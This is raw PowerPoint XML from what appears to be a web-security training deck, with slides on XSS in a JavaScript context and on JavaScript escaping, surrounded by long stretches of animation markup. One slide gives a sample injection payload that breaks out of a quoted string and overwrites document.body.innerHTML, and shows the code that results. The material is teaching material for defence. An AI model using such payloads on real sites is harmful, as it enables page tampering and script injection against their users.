                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="94" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="95" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="96" presetID="42" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="97" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9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xit" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="104" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="106" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="107" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="108" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="109" presetID="42" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="110" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="111" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="1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6" grpId="0" build="p"/>
      <p:bldP spid="6" grpId="1" build="p"/>
      <p:bldP spid="7" grpId="0" build="p"/>
      <p:bldP spid="7" grpId="1" build="p"/>
      <p:bldP spid="8" grpId="0" build="p"/>
      <p:bldP spid="8" grpId="1" build="p"/>
      <p:bldP spid="9" grpId="0" build="p"/>
      <p:bldP spid="9" grpId="1" build="p"/>
      <p:bldP spid="10" grpId="0" build="p"/>
      <p:bldP spid="10" grpId="1" build="p"/>
      <p:bldP spid="11" grpId="0" build="p"/>
      <p:bldP spid="11" grpId="1" build="p"/>
      <p:bldP spid="12" grpId="0" build="p"/>
      <p:bldP spid="12" grpId="1" build="p"/>
      <p:bldP spid="1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XSS in JavaScript Context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>viewPage?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=Jerry </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="744639" y="2209816"/>
            <a:ext cx="678754" cy="1443929"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720"/>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418</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419</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420</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421</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1598350" y="2259920"/>
            <a:ext cx="6426255" cy="1338105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>     //create variable for name input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> name = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Jerry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="182880" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5051051" y="2875563"/>
            <a:ext cx="3109612" cy="584776"/>
            <a:chOff x="4491894" y="2442660"/>
            <a:chExt cx="3109612" cy="584776"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5563537" y="2442660"/>
              <a:ext cx="2037969" cy="584776"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="DB3D16"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>What attacks would be possible?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="11" name="Straight Connector 10"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4491894" y="2657364"/>
              <a:ext cx="969496" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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457200" y="4109019"/>
            <a:ext cx="8132312" cy="1754327"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Sample Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>	";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.body.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>allyourbase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>';//</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Leads To</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.body.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>allyourbase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>';//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7091102" y="536804"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="Group 15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="Oval 21"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>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18" name="TextBox 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6714321" y="1019404"/>
              <a:ext cx="1716797" cy="615553"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="4000" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>JS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2687103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37"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900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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
              <a:t>JavaScript Escaping Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1465504"/>
            <a:ext cx="8229052" cy="3531671"/>
            <a:chOff x="457200" y="3504779"/>
            <a:chExt cx="8229052" cy="3531671"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="Picture 25" descr="codewindow.png"/>
            <p:cNvPicPr>
              <a:picLocks/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3" cstate="print">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect l="3" t="-82" r="3" b="-82"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3913782"/>
              <a:ext cx="8229052" cy="3122668"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Content Placeholder 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="790400" y="4009237"/>
              <a:ext cx="7895852" cy="2954655"/>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spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&lt;button </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>onclick</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>="alert('</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>UNTRUSTED</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>');</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="mr-IN" sz="2400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>click me&lt;/button&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
